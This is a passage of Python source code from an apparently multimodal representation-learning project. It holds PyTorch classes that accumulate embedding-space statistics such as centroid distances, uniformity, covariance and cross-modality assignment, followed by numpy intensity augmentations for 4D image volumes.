        self.emb2emb_dists_weighted = []  # (1)
        self.cent2cent_dists__batch_estimate = []  # (1)
    def compute(self, compute_dist_cent2cent=False):
        """Aggregate all accumulated batch statistics into a metrics dict.

        :param compute_dist_cent2cent: also compute the exact pairwise
            centroid distances over the whole accumulated set (O(B_total^2)).
        """
        if len(self.means) == 0:
            return {}
        means = torch.cat(self.means, dim=0)  # (B_total x d)
        vars = torch.cat(self.vars, dim=0)  # (B_total x d)
        emb2cent_dists__means = torch.stack(self.emb2cent_dists__means, dim=0)  # (N_batch)
        emb2cent_dists__vars = torch.stack(self.emb2cent_dists__vars, dim=0)  # (N_batch)
        emb2emb_dists = torch.stack(self.emb2emb_dists, dim=0)  # (N_batch)
        cent2cent_dists__batch_estimate = torch.stack(self.cent2cent_dists__batch_estimate, dim=0)  # N_batch
        per_sample_uniformity = torch.cat(self.per_sample_uniformity, dim=0)  # B_total
        # Across-sample variance of centroids; 0. when only a single sample exists.
        var_sample_centroids = means.var(dim=0) if means.shape[0] > 1 else 0.  # (d)
        ch_std_per_sample = torch.sqrt(vars).mean(1)  # (B_total)
        metrics = {
            # Law of total variance: centroid variance + mean within-sample variance.
            self.prefix + "ch_std": torch.sqrt(var_sample_centroids + vars.mean(dim=0)).mean(),  # total_std
            self.prefix + "ch_std_per_sample": ch_std_per_sample.mean(),  # per_sample_std
            self.prefix + "ch_std_per_sample__std": ch_std_per_sample.std(),
            self.prefix + "ch_std_sample_centroids": torch.sqrt(var_sample_centroids).mean(),  # sample_means_std,
            self.prefix + "per_sample_uniformity": per_sample_uniformity.mean(),
            self.prefix + "per_sample_uniformity__std": per_sample_uniformity.std(),
            self.prefix + "dist_emb2cent": emb2cent_dists__means.mean(),  # emb_avg_centroid_dist
            self.prefix + "dist_emb2cent__std": compute_std_from_sample_vars(emb2cent_dists__means, emb2cent_dists__vars),
            self.prefix + "dist_emb2emb": emb2emb_dists.mean(),  # emb_avg_dist,
            self.prefix + "dist_cent2cent__batch_estimate": cent2cent_dists__batch_estimate.mean(),  # emb_avg_batch_centroid_dist
            self.prefix + "dist_cent2dataset": compute_avg_dist_to_mean(means)  # centroid_sample2dataset_dist
        }
        if compute_dist_cent2cent:
            mean_cdist = torch.cdist(means.unsqueeze(0), means.unsqueeze(0), p=2).squeeze(0)  # (B_total x B_total)
            metrics[self.prefix + "dist_cent2cent"] = mean_cdist.mean()
        if self.compute_cov:
            cov_offdiagonal_per_sample = torch.cat(self.cov_offdiagonal_per_sample, dim=0)  # (B_total)
            cov_offdiagonal = torch.stack(self.cov_offdiagonal, dim=0)  # (num_batche)
            B, d = means.size()
            diag = torch.eye(d, device=means.device).bool()
            cov_of_centroids = means - means.mean(dim=0, keepdim=True)  # (B x d)
            cov_of_centroids = (cov_of_centroids.T @ cov_of_centroids) / (B - 1)  # (d x d)
            metrics[self.prefix + "cov_offdiagonal__batch_estimate"] = cov_offdiagonal.mean()
            metrics[self.prefix + "cov_offdiagonal_per_sample"] = cov_offdiagonal_per_sample.mean()
            metrics[self.prefix + "cov_offdiagonal_per_sample__std"] = cov_offdiagonal_per_sample.std()
            metrics[self.prefix + "cov_offdiagonal_sample_centroids"] = cov_of_centroids[~diag].pow_(2).sum() / d
        if len(self.emb2emb_dists_weighted) > 0:
            emb2emb_dists_weighted = torch.stack(self.emb2emb_dists_weighted, dim=0)  # (N_batch)
            metrics[self.prefix + "dist_emb2emb__weighted"] = emb2emb_dists_weighted.mean()  # emb_weighted_avg_dist
        return metrics
    def update(self, embeddings, mask, weights=None):
        """Accumulate statistics for one batch of local embeddings.

        :param embeddings: B x N x d
        :param mask: B x N (bool; True = valid token)
        :param weights: optional B x N importance weights for weighted distances
        :return: the per-sample centroids (B x d)
        """
        if embeddings is None:
            return None
        B, N, d = embeddings.size()
        N_local = mask.float().sum(dim=1)  # (B) number of valid tokens per sample
        # Rescales means computed over all N positions to means over valid ones.
        avg_correction_factor = N_local / N  # (B)
        # ----- per-channel mean, variance, and covariance of embeddings (respect masks)-----
        mean = (mask[:, :, None] * embeddings).mean(dim=1) / avg_correction_factor[:, None]  # (B x d)
        expanded_means = mean.unsqueeze(1).expand(B, N, d)  # (B x N x d)
        # Masked positions are replaced by the sample mean so they contribute
        # zero deviation to the variance; the count is then corrected below.
        var_embeddings = embeddings.clone()
        var_embeddings[~mask] = expanded_means[~mask]
        avg_correction_factor_var = (mask.float().sum(dim=1) - 1) / (N - 1)  # (B)
        var = var_embeddings.new_zeros(B, d)
        # Samples with a single valid token keep variance 0 (undefined otherwise).
        var_samples_mask = N_local > 1  # (B)
        var[var_samples_mask] = var_embeddings[var_samples_mask].var(dim=1) / avg_correction_factor_var[var_samples_mask, None]  # (B x d)
        if self.compute_cov:
            embeddings_for_cov = embeddings - expanded_means  # (B x N x d)
            # set to zero to ignore
            embeddings_for_cov[~mask, :] = 0.
            # per-sample cov
            cov = torch.bmm(embeddings_for_cov.transpose(-1, -2), embeddings_for_cov) / (N_local[:, None, None] - 1)  # (B x d x d)
            # set cov of samples with single local embeddings to 0
            cov[mask.sum(-1) <= 1] = 0.
            cov_of_centroids = mean - mean.mean(dim=0, keepdim=True)  # (B x d)
            cov_of_centroids = (cov_of_centroids.T @ cov_of_centroids) / (B - 1)  # (d x d)
            cov_total = torch.mean(cov, dim=0) + cov_of_centroids  # (d x d)
            B, d, _ = cov.size()
            diag = torch.eye(d, device=cov.device).bool()
            self.cov_offdiagonal_per_sample.append((cov[:, ~diag].pow_(2).sum(-1) / d))  # (B)
            self.cov_offdiagonal.append((cov_total[~diag].pow_(2).sum() / d))  # (1)
        self.means.append(mean)
        self.vars.append(var)
        # ----- avg distances of embeddings to per-sample centroids (emb2cent) -----
        # (B x N)
        pdists = F.pairwise_distance(embeddings.reshape(B * N, d), expanded_means.reshape(B * N, d), p=2).view(B, N)
        avg_dist_to_mean = (mask * pdists).mean(dim=1) / avg_correction_factor  # (B)
        self.emb2cent_dists__means.append(avg_dist_to_mean.mean())
        self.emb2cent_dists__vars.append(avg_dist_to_mean.var())
        del pdists
        # ----- avg pairwise distances btw. embeddings (emb2emb) -----
        cdist = torch.cdist(embeddings, embeddings)  # (B x N x N)
        # Zero out any pair involving a masked token; the double correction
        # factor below compensates for the zeroed entries in both dims.
        cdist = cdist * mask[:, :, None] * mask[:, None, :]
        self.emb2emb_dists.append((
            (cdist.mean(dim=2) / avg_correction_factor[:, None]).mean(dim=1) / avg_correction_factor).mean())
        if weights is not None:
            weighted_cdist = (weights[:, None, :] * cdist).sum(dim=2)  # (B x N)
            self.emb2emb_dists_weighted.append((weights * weighted_cdist).sum(dim=1).mean())
        uniformity = torch.exp(-2 * (cdist ** 2)) * mask[:, :, None] * mask[:, None, :]  # (B x N x N)
        # (B)
        uniformity = (uniformity.mean(2) / avg_correction_factor[:, None]).mean(dim=1) / avg_correction_factor
        self.per_sample_uniformity.append(uniformity.log())
        del cdist
        # ----- avg pairwise distances btw. per-sample centroids (centroid_sample2sample_dist) -----
        mean_cdist = torch.cdist(mean.unsqueeze(0), mean.unsqueeze(0), p=2).squeeze(0)  # (B x B)
        self.cent2cent_dists__batch_estimate.append(mean_cdist.mean())
        return mean
class GlobalEmbeddingPairMetrics:
    """
    - rmse
    - dist (dist__std) -> avg (normalized) l2 distance
    """

    def __init__(self, prefix):
        self.prefix = prefix + '/'
        self.batch_mse = []      # per-batch mean squared pair distance
        self.dists__means = []   # per-batch mean of pair L2 distances
        self.dists__vars = []    # per-batch variance of pair L2 distances

    def update(self, embeddings_1, embeddings_2):
        """Accumulate distance statistics for one batch of embedding pairs.

        :param embeddings_1: (B x d)
        :param embeddings_2: (B x d)
        """
        if embeddings_1 is None or embeddings_2 is None:
            return
        # -- MSE --
        # Squared L2 distance per pair, shape (B).
        sq_dists = F.mse_loss(embeddings_1, embeddings_2, reduction='none').sum(-1)
        self.batch_mse.append(sq_dists.mean())  # (1)
        l2_dists = torch.sqrt(sq_dists)  # (B)
        self.dists__means.append(l2_dists.mean())
        self.dists__vars.append(l2_dists.var())

    def compute(self):
        """Aggregate the accumulated batch statistics into a metrics dict."""
        if not self.batch_mse:
            return {}
        mse_per_batch = torch.stack(self.batch_mse, dim=0)      # (N_batch)
        mean_per_batch = torch.stack(self.dists__means, dim=0)  # (N_batch)
        var_per_batch = torch.stack(self.dists__vars, dim=0)    # (N_batch)
        return {
            self.prefix + "rmse": torch.sqrt(mse_per_batch.mean()),
            self.prefix + "dist": mean_per_batch.mean(),
            self.prefix + "dist__std": compute_std_from_sample_vars(mean_per_batch, var_per_batch)
        }
class LocalEmbeddingPairMetrics:
    """
    Pairwise distances between aligned *local* (per-token) embeddings,
    respecting a validity mask.

    avg per-sample distances
    - sample_rmse (sample_rmse__std, sample_rmse__weighted)
    - sample_min_dist, sample_max_dist, sample_std_dist
    """
    def __init__(self, prefix):
        self.prefix = prefix + '/'
        self.sample_rmse__means = []  # (1)
        self.sample_rmse__vars = []  # (1)
        self.sample_rmse__weighted = []  # (1)
        self.sample_min_dist = []  # (1)
        self.sample_max_dist = []  # (1)
        self.sample_std_dist = []  # (1)
    def compute(self):
        """Aggregate all accumulated batch statistics into a metrics dict."""
        if len(self.sample_rmse__means) == 0:
            return {}
        sample_rmse__means = torch.stack(self.sample_rmse__means, dim=0)  # (N_batch)
        sample_rmse__vars = torch.stack(self.sample_rmse__vars, dim=0)  # (N_batch)
        sample_min_dist = torch.stack(self.sample_min_dist, dim=0)  # (N_batch)
        sample_max_dist = torch.stack(self.sample_max_dist, dim=0)  # (N_batch)
        sample_std_dist = torch.stack(self.sample_std_dist, dim=0)  # (N_batch)
        metrics = {
            self.prefix + "sample_rmse": sample_rmse__means.mean(),  # l2att_emb_mse
            self.prefix + "sample_rmse__std": compute_std_from_sample_vars(sample_rmse__means, sample_rmse__vars),
            self.prefix + "sample_min_dist": sample_min_dist.mean(),  # l2att_emb_min_dist
            self.prefix + "sample_max_dist": sample_max_dist.mean(),  # l2att_emb_max_dist
            self.prefix + "sample_std_dist": sample_std_dist.mean(),  # l2att_emb_std_dist
        }
        if len(self.sample_rmse__weighted) > 0:
            sample_rmse__weighted = torch.stack(self.sample_rmse__weighted, dim=0)  # (N_batch)
            metrics[self.prefix + "sample_rmse__weighted"] = sample_rmse__weighted.mean()  # l2att_emb_weighted_mse
        return metrics
    def update(self, embeddings_1, embeddings_2, mask, weights=None):
        """Accumulate statistics for one batch of aligned local embeddings.

        :param embeddings_1: (B x N x d)
        :param embeddings_2: (B x N x d)
        :param mask: (B x N) bool; True = valid token position
        :param weights: optional (B x N) importance weights
        :return:
        """
        if embeddings_1 is None or embeddings_2 is None:
            return
        B, N, d = embeddings_1.size()
        # correction factor (due to mask) when taking the mean over N dimension
        avg_correction_factor = mask.float().sum(dim=1) / N  # (B)
        # -- RMSE --
        # Per-token squared distance; masked positions contribute 0.
        mse = F.mse_loss(embeddings_1, embeddings_2, reduction='none').sum(-1) * mask  # (B x N)
        rmse = torch.sqrt(mse.mean(dim=1) / avg_correction_factor)  # (B)
        if weights is not None:
            weighted_rmse = torch.sqrt((weights * mse).sum(dim=1))  # (B)
        self.sample_rmse__means.append(rmse.mean())
        self.sample_rmse__vars.append(rmse.var())
        if weights is not None:
            self.sample_rmse__weighted.append(weighted_rmse.mean())
        # -- min/max/std RMSE --
        dists = torch.sqrt(mse)  # (B x N)
        # For the min, masked entries (which are 0) must be excluded -> inf.
        dists_for_min = dists.clone()  # (B x N)
        dists_for_min[~mask] = float('inf')
        self.sample_min_dist.append(dists_for_min.min(dim=1)[0].mean())
        # NOTE(review): max and var below still include the masked (zero)
        # entries — max is unaffected as long as true distances are >= 0, but
        # the var is only mask-corrected via avg_correction_factor; verify
        # this approximation is intended.
        self.sample_max_dist.append(dists.max(dim=1)[0].mean())
        self.sample_std_dist.append(torch.sqrt(dists.var(dim=1) / avg_correction_factor).mean())
class LocalDistributionPairMetrics:
    """
    Distances and assignment statistics between two *sets* of local embeddings
    per sample (e.g. two modalities), respecting per-set validity masks.

    Note: ab_emb_centroid_dist computed on distribution avg with GlobalEmbeddingPair
    - dist_emb2emb (dist_emb2emb__weighted)
    - 1NN_emb2emb_2to1, 1NN_emb2emb_1to2
    - assignment_2to2, assignment_1to1 => 1 = assigned to same modality, 0 = assigned to other modality, 0.5 = perfect alignment of modalities
    """
    def __init__(self, prefix):
        self.prefix = prefix + '/'
        self.emb2emb_dists = []  # (1)
        self.emb2emb_dists__weighted = []  # (1)
        self.emb2emb_1NN_2to1 = []  # (1)
        self.emb2emb_1NN_1to2 = []  # (1) a2b_emb_avg_1NN_dist
        self.assignment_2to2 = []  # (1)
        self.assignment_1to1 = []  # (1)
    def compute(self):
        """Aggregate all accumulated batch statistics into a metrics dict."""
        if len(self.emb2emb_dists) == 0:
            return {}
        emb2emb_dists = torch.stack(self.emb2emb_dists, dim=0)  # (N_batch)
        emb2emb_1NN_2to1 = torch.stack(self.emb2emb_1NN_2to1, dim=0)  # (N_batch)
        emb2emb_1NN_1to2 = torch.stack(self.emb2emb_1NN_1to2, dim=0)  # (N_batch)
        assignment_2to2 = torch.stack(self.assignment_2to2, dim=0)  # (N_batch)
        assignment_1to1 = torch.stack(self.assignment_1to1, dim=0)  # (N_batch)
        metrics = {
            self.prefix + "dist_emb2emb": emb2emb_dists.mean(),  # ab_emb_avg_dist
            self.prefix + "1NN_emb2emb_2to1": emb2emb_1NN_2to1.mean(),  # b2a_emb_avg_1NN_dist
            self.prefix + "1NN_emb2emb_1to2": emb2emb_1NN_1to2.mean(),  # a2b_emb_avg_1NN_dist
            self.prefix + "assignment_2to2": assignment_2to2.mean(),
            self.prefix + "assignment_1to1": assignment_1to1.mean()
        }
        if len(self.emb2emb_dists__weighted) > 0:
            emb2emb_dists__weighted = torch.stack(self.emb2emb_dists__weighted, dim=0)  # (N_batch)
            metrics[self.prefix + "dist_emb2emb__weighted"] = emb2emb_dists__weighted.mean()  # ab_emb_weighted_avg_dist
        return metrics
    def update(self,
               embeddings_1, embeddings_2,
               mean_1, mean_2,
               mask_1=None, mask_2=None,
               weights_1=None, weights_2=None):
        """Accumulate statistics for one batch.

        :param embeddings_1: (B x N_1 x d), :param embeddings_2: (B x N_2 x d)
        :param mean_1: (B x d) per-sample centroids of set 1, mean_2 likewise
        :param mask_1: (B x N_1) bool, mask_2: (B x N_2) bool.
            NOTE(review): despite the None defaults, both masks are required —
            the body dereferences them unconditionally.
        :param weights_1 / weights_2: optional importance weights
        """
        if embeddings_1 is None or embeddings_2 is None:
            return
        B, N_1, d = embeddings_1.size()
        _, N_2, _ = embeddings_2.size()
        # correction factor (due to mask) when taking the mean over N dimension
        avg_correction_factor_1 = mask_1.float().sum(dim=1) / N_1  # (B)
        avg_correction_factor_2 = mask_2.float().sum(dim=1) / N_2  # (B)
        # ----- avg pairwise distance btw embeddings ----
        cdist = torch.cdist(embeddings_1, embeddings_2)  # (B x N_1 x N_2)
        cdist = cdist * mask_1[:, :, None] * mask_2[:, None, :]
        self.emb2emb_dists.append((
            (cdist.mean(dim=2) / avg_correction_factor_2[:, None]).mean(dim=1) / avg_correction_factor_1).mean())
        if weights_1 is not None or weights_2 is not None:
            if weights_2 is not None:
                weighted_cdist = (weights_2[:, None, :] * cdist).sum(dim=2)  # (B x N_1)
            else:
                weighted_cdist = cdist.mean(dim=2) / avg_correction_factor_2[:, None]  # (B x N_1)
            if weights_1 is not None:
                weighted_cdist = (weights_1 * weighted_cdist).sum(dim=1)  # (B)
            else:
                weighted_cdist = cdist.mean(dim=1) / avg_correction_factor_1  # (B)
            self.emb2emb_dists__weighted.append(weighted_cdist.mean())
        # ----- 1NN dist -----
        # BUGFIX: Tensor.masked_fill is OUT-OF-PLACE; the original discarded its
        # return value, so padded positions were never set to inf. Because cdist
        # was pre-multiplied by the masks (i.e. zeroed at padded positions), the
        # min() then always returned 0 for any row with padding. Assign the
        # result so padded entries are properly excluded from the min.
        cdist_b2a = cdist.masked_fill(~mask_2[:, None, :], float('inf'))  # inf for N2 (ignore in min operation)
        min_dist_b2a = cdist_b2a.min(dim=2)[0]  # (B x N_1)
        cdist_a2b = cdist.transpose(-1, -2).masked_fill(~mask_1[:, None, :], float('inf'))  # inf for N1 (ignore in min operation)
        min_dist_a2b = cdist_a2b.min(dim=2)[0]  # (B x N_2)
        self.emb2emb_1NN_2to1.append((min_dist_b2a.mean(dim=1) / avg_correction_factor_1).mean())
        self.emb2emb_1NN_1to2.append((min_dist_a2b.mean(dim=1) / avg_correction_factor_2).mean())
        #if weights_1 is not None:
        #    batch_means['b2a_emb_weighted_avg_1NN_dist'] = (weights_1 * min_dist_b2a).sum(dim=1).mean()
        #if weights_2 is not None:
        #    batch_means['a2b_emb_weighted_avg_1NN_dist'] = (weights_2 * min_dist_a2b).sum(dim=1).mean()
        # min_dist_b2a[~mask_1] = float('inf')  # inf for N1 (ignore in min operation)
        # batch_means['ab_emb_min_dist'] = min_dist_b2a.min(dim=1)[0].mean()
        # ----- centroid assignment: avg dist to other centroid / avg dist to same centroid TODO -----
        # Soft assignment via inverse-square-distance scores to each centroid:
        # 1 = token sits at its own modality's centroid, 0.5 = equidistant.
        expanded_means_b2a = mean_1.unsqueeze(1).expand(B, N_2, d)
        dists_b2a = F.pairwise_distance(embeddings_2.reshape(B * N_2, d), expanded_means_b2a.reshape(B * N_2, d), p=2)\
            .view(B, N_2)
        scores_b2a = torch.reciprocal(dists_b2a ** 2)
        expanded_means_b2b = mean_2.unsqueeze(1).expand(B, N_2, d)
        dists_b2b = F.pairwise_distance(embeddings_2.reshape(B * N_2, d), expanded_means_b2b.reshape(B * N_2, d), p=2) \
            .view(B, N_2)
        scores_b2b = torch.reciprocal(dists_b2b ** 2)
        assignment_b2b = (scores_b2b / (scores_b2b + scores_b2a))  # (B x N_2)
        self.assignment_2to2.append(((mask_2 * assignment_b2b).mean(dim=1) / avg_correction_factor_2).mean())
        expanded_means_a2b = mean_2.unsqueeze(1).expand(B, N_1, d)
        dists_a2b = F.pairwise_distance(embeddings_1.reshape(B * N_1, d), expanded_means_a2b.reshape(B * N_1, d), p=2) \
            .view(B, N_1)
        scores_a2b = torch.reciprocal(dists_a2b ** 2)
        expanded_means_a2a = mean_1.unsqueeze(1).expand(B, N_1, d)
        dists_a2a = F.pairwise_distance(embeddings_1.reshape(B * N_1, d), expanded_means_a2a.reshape(B * N_1, d), p=2) \
            .view(B, N_1)
        scores_a2a = torch.reciprocal(dists_a2a ** 2)
        assignment_a2a = (scores_a2a / (scores_a2a + scores_a2b))  # (B x N_1)
        self.assignment_1to1.append(((mask_1 * assignment_a2a).mean(dim=1) / avg_correction_factor_1).mean())
class EmbeddingMetrics(Metric):
    """Collects every embedding-space statistic tracked for the two views (a, b)."""

    def __init__(self, compute_cov=False):
        super(EmbeddingMetrics, self).__init__(compute_on_step=False)
        # Whether the child trackers should also estimate covariance statistics.
        self.compute_cov = compute_cov
        self._init()

    def _init(self):
        """(Re)build all child metric trackers in a fresh, empty state."""
        cov = self.compute_cov
        # --- metrics over a single embedding space ---
        self.yl_a_metrics = LocalEmbeddingSpaceMetrics('yl_a', compute_cov=cov)
        self.yl_b_metrics = LocalEmbeddingSpaceMetrics('yl_b', compute_cov=cov)
        self.zl_a_metrics = LocalEmbeddingSpaceMetrics('zl_a', compute_cov=cov)
        self.zl_b_metrics = LocalEmbeddingSpaceMetrics('zl_b', compute_cov=cov)
        self.zl_a__avg_metrics = GlobalEmbeddingSpaceMetrics('zl_a_avg', compute_cov=cov)
        self.zl_b__avg_metrics = GlobalEmbeddingSpaceMetrics('zl_b_avg', compute_cov=cov)
        self.zl_a_with_b_metrics = LocalEmbeddingSpaceMetrics('zl_a&b', compute_cov=cov)
        self.yg_a_metrics = GlobalEmbeddingSpaceMetrics('yg_a', compute_cov=cov)
        self.yg_b_metrics = GlobalEmbeddingSpaceMetrics('yg_b', compute_cov=cov)
        self.zg_a_metrics = GlobalEmbeddingSpaceMetrics('zg_a', compute_cov=cov)
        self.zg_b_metrics = GlobalEmbeddingSpaceMetrics('zg_b', compute_cov=cov)
        # --- metrics comparing the two spaces ---
        self.zl_ab_metrics = LocalDistributionPairMetrics('zl_a||zl_b')
        self.zl_ab_avg_metrics = GlobalEmbeddingPairMetrics('zl_a_avg;zl_b_avg')
        # --- alignment metrics (cross-translated embeddings) ---
        self.zl_b2a_metrics = LocalEmbeddingPairMetrics('zl_a;zl_b2a')
        self.zl_a2b_metrics = LocalEmbeddingPairMetrics('zl_b;zl_a2b')
        self.zg_ab_metrics = GlobalEmbeddingPairMetrics('zg_a;zg_b')

    def update(self, embeddings: EmbeddingsData):
        """Feed one batch of (detached, normalized) embeddings to every tracker."""
        embeddings = embeddings.detach().normalize()
        valid_a = prepare_mask(embeddings.zl_a, embeddings.mask_a)
        valid_b = prepare_mask(embeddings.zl_b, embeddings.mask_b)
        self.yl_a_metrics.update(embeddings.yl_a, mask=valid_a)
        self.yl_b_metrics.update(embeddings.yl_b, mask=valid_b)
        # The local trackers return per-sample centroids, which are reused below.
        centroid_a = self.zl_a_metrics.update(embeddings.zl_a, mask=valid_a, weights=embeddings.weights_a)
        centroid_b = self.zl_b_metrics.update(embeddings.zl_b, mask=valid_b, weights=embeddings.weights_b)
        self.zl_a__avg_metrics.update(centroid_a)
        self.zl_b__avg_metrics.update(centroid_b)
        if embeddings.zl_a is not None and embeddings.zl_b is not None:
            # Joint space: both token sets concatenated along the token axis.
            self.zl_a_with_b_metrics.update(torch.cat([embeddings.zl_a, embeddings.zl_b], dim=1),
                                            mask=torch.cat([valid_a, valid_b], dim=1))
        self.yg_a_metrics.update(embeddings.yg_a)
        self.yg_b_metrics.update(embeddings.yg_b)
        self.zg_a_metrics.update(embeddings.zg_a)
        self.zg_b_metrics.update(embeddings.zg_b)
        self.zl_ab_metrics.update(embeddings.zl_a, embeddings.zl_b,
                                  mean_1=centroid_a, mean_2=centroid_b,
                                  mask_1=valid_a, mask_2=valid_b,
                                  weights_1=embeddings.weights_a, weights_2=embeddings.weights_b)
        self.zl_ab_avg_metrics.update(centroid_a, centroid_b)
        self.zl_b2a_metrics.update(embeddings.zl_a, embeddings.zl_b2a, mask=valid_a, weights=embeddings.weights_a)
        self.zl_a2b_metrics.update(embeddings.zl_b, embeddings.zl_a2b, mask=valid_b, weights=embeddings.weights_b)
        self.zg_ab_metrics.update(embeddings.zg_a, embeddings.zg_b)

    def compute(self):
        """Merge every tracker's results into one flat metrics dictionary."""
        trackers = (
            self.yl_a_metrics, self.yl_b_metrics,
            self.zl_a_metrics, self.zl_b_metrics,
            self.zl_a__avg_metrics, self.zl_b__avg_metrics,
            self.zl_a_with_b_metrics,
            self.yg_a_metrics, self.yg_b_metrics,
            self.zg_a_metrics, self.zg_b_metrics,
            self.zl_ab_metrics, self.zl_ab_avg_metrics,
            self.zl_b2a_metrics, self.zl_a2b_metrics,
            self.zg_ab_metrics,
        )
        metrics = {}
        with torch.no_grad():
            for tracker in trackers:
                metrics.update(tracker.compute())
        return metrics

    def reset(self):
        """Drop all accumulated state by rebuilding the child trackers."""
        self._init()
class DownstreamEmbeddingMetrics(Metric):
    """Embedding statistics tracked for a single downstream view (a only)."""

    def __init__(self, compute_cov=False):
        super(DownstreamEmbeddingMetrics, self).__init__(compute_on_step=False)
        # Whether the child trackers should also estimate covariance statistics.
        self.compute_cov = compute_cov
        self._init()

    def _init(self):
        """(Re)build the two single-space trackers in a fresh, empty state."""
        self.yl_a_metrics = LocalEmbeddingSpaceMetrics('yl_a', compute_cov=self.compute_cov)
        self.yg_a_metrics = GlobalEmbeddingSpaceMetrics('yg_a', compute_cov=self.compute_cov)

    def update(self, embeddings: LocalScanDownstreamEmbeddings):
        """Feed one batch of (detached, normalized) downstream embeddings."""
        embeddings = embeddings.detach().normalize()
        # No external mask is available downstream, so every token counts as valid.
        self.yl_a_metrics.update(embeddings.yl_a, mask=prepare_mask(embeddings.yl_a, mask=None))
        self.yg_a_metrics.update(embeddings.yg_a)

    def compute(self):
        """Merge both trackers' results into one dictionary."""
        metrics = {}
        with torch.no_grad():
            for tracker in (self.yl_a_metrics, self.yg_a_metrics):
                metrics.update(tracker.compute())
        return metrics

    def reset(self):
        """Drop all accumulated state by rebuilding the child trackers."""
        self._init()
def prepare_mask(local, mask):
    """Return a (B, N) boolean validity mask for the *local* embeddings.

    If *local* is None there is nothing to mask, so None is returned.
    If a mask object is supplied, its ``binary_mask`` representation is used;
    otherwise every token is considered valid.
    """
    if local is None:
        return None
    if mask is not None:
        return mask.binary_mask
    batch, num_tokens, _ = local.size()
    return local.new_ones((batch, num_tokens), dtype=bool)
|
import numpy as np
import torch
import torch.nn as nn
class NumpyDataAugmentation:
    """
    Base class for intensity data augmentations applied to a single image.

    The input is a 4D numpy array laid out as
    (num_channels, x_dim, y_dim, z_dim); the transformation is applied to
    each channel independently. Subclasses must implement
    :meth:`per_channel_transform`.
    """

    def __init__(self, proba):
        """:param proba: probability of transforming each channel of a sample."""
        self.proba = proba

    def check_data(self, array):
        """Validate the expected (num_channels, x, y, z) layout."""
        assert len(array.shape) == 4, "Need a 4D numpy array."

    def draw_parameter_in_range(self, range=(0,1)):
        """Sample a parameter uniformly from *range* (a degenerate range returns its bound)."""
        low, high = range
        return low if low == high else np.random.uniform(low, high)

    def per_channel_transform(self, chan_img):
        """Transform one channel (in place); must be overridden by subclasses."""
        raise NotImplementedError

    def __call__(self, img, mask=None):
        """Apply the transform channel-wise, optionally restricted to mask > 0."""
        self.check_data(img)
        for chan_idx in range(img.shape[0]):
            # Each channel is (independently) transformed with probability self.proba.
            if np.random.uniform() > self.proba:
                continue
            if mask is None:
                img[chan_idx, ...] = self.per_channel_transform(img[chan_idx, ...])
            else:
                img[chan_idx, mask > 0] = self.per_channel_transform(img[chan_idx, mask > 0])
        return img
class AdditiveGaussianNoise(NumpyDataAugmentation):
    """Add zero-mean Gaussian noise with a per-channel random standard deviation."""

    def __init__(self, std_interval=(0, 0.1), proba=0.15):
        """
        :param std_interval: interval the noise standard deviation is drawn
            from (uniformly); a different std is drawn for every channel.
        :param proba: float between 0 and 1; probability to apply the
            augmentation to each channel of a sample.
        """
        super(AdditiveGaussianNoise, self).__init__(proba)
        assert std_interval[0] <= std_interval[1]
        self.std_interval = std_interval

    def per_channel_transform(self, chan_img):
        # Draw a fresh std for this channel, then perturb the channel in place.
        noise_std = self.draw_parameter_in_range(self.std_interval)
        chan_img += np.random.normal(0.0, noise_std, size=chan_img.shape)
        return chan_img
class Gamma(NumpyDataAugmentation):
    """Gamma (power-law) intensity transform that preserves range, mean and std.

    The channel is rescaled to [0, 1], raised to a random power, rescaled back,
    and finally shifted/scaled so its mean and std match the original channel.
    """

    def __init__(self, power_range=(0.7, 1.5), invert_intensities=False, proba=0.3):
        """
        :param power_range: interval the gamma exponent is drawn from.
        :param invert_intensities: negate intensities before/after the transform.
        :param proba: probability to apply the augmentation to each channel.
        """
        super(Gamma, self).__init__(proba)
        assert power_range[0] <= power_range[1]
        self.power_range = power_range
        self.invert_intensities = invert_intensities

    def per_channel_transform(self, chan_img):
        # With probability 0.5 (and only if allowed by power_range) draw a
        # power < 1, otherwise draw a power >= 1.
        if np.random.random() < 0.5 and self.power_range[0] < 1:
            power_bounds = (self.power_range[0], 1)
        else:
            power_bounds = (max(self.power_range[0], 1), self.power_range[1])
        power = self.draw_parameter_in_range(power_bounds)
        if self.invert_intensities:
            chan_img *= -1
        # Remember the original statistics so they can be restored afterwards.
        min_img = np.min(chan_img)
        max_img = np.max(chan_img)
        mean_img = np.mean(chan_img)
        std_img = np.std(chan_img)
        value_range = max_img - min_img
        # Scale the img to [0, 1] (epsilon guards a flat channel).
        chan_img = (chan_img - min_img) / (value_range + 1e-7)
        # Apply the gamma transformation
        chan_img = np.power(chan_img, power)
        # Rescale
        chan_img = (chan_img * value_range) + min_img
        # Preserve mean and std of the image before transformation
        chan_img -= np.mean(chan_img)
        new_std = np.std(chan_img)
        if new_std > 0:
            chan_img *= std_img / new_std
        # BUGFIX: the division above used to be unconditional; for a constant
        # channel both stds are zero, so 0/0 produced NaN and filled the
        # whole channel with NaNs. Non-constant channels are unaffected.
        chan_img += mean_img
        if self.invert_intensities:
            chan_img *= -1
        return chan_img
class Contrast(NumpyDataAugmentation):
    """Scale the dispersion of intensities around the channel mean."""

    def __init__(self, multiplier_range=(0.75, 1.25), proba=0.15):
        """
        :param multiplier_range: interval the contrast factor is drawn from.
        :param proba: probability to apply the augmentation to each channel.
        """
        super(Contrast, self).__init__(proba)
        assert multiplier_range[0] <= multiplier_range[1]
        self.multiplier_range = multiplier_range

    def per_channel_transform(self, chan_img):
        factor = self.draw_parameter_in_range(self.multiplier_range)
        mean_val = np.mean(chan_img)
        lo, hi = np.min(chan_img), np.max(chan_img)
        # Stretch (or shrink) the deviations from the mean by the drawn factor...
        stretched = (chan_img - mean_val) * factor + mean_val
        # ...but never exceed the original intensity extrema.
        return np.clip(stretched, a_min=lo, a_max=hi)
class MultiplicativeBrightness(NumpyDataAugmentation):
    """Multiply a whole channel by a random brightness factor."""

    def __init__(self, multiplier_range=(0.75, 1.25), proba=0.15):
        """
        :param multiplier_range: interval the brightness factor is drawn from.
        :param proba: probability to apply the augmentation to each channel.
        """
        super(MultiplicativeBrightness, self).__init__(proba)
        assert multiplier_range[0] <= multiplier_range[1]
        self.multiplier_range = multiplier_range

    def per_channel_transform(self, chan_img):
        # In-place scaling keeps the base-class masked assignment valid.
        chan_img *= self.draw_parameter_in_range(self.multiplier_range)
        return chan_img
# RandomZoom does not inherit from NumpyDataAugmentation
# because it applies to img + seg together
class RandomZoom:
    """Randomly rescale an image and its segmentation by a common factor.

    The segmentation is zoomed via its one-hot encoding (trilinear
    interpolation on the class channels, then argmax) and the result is
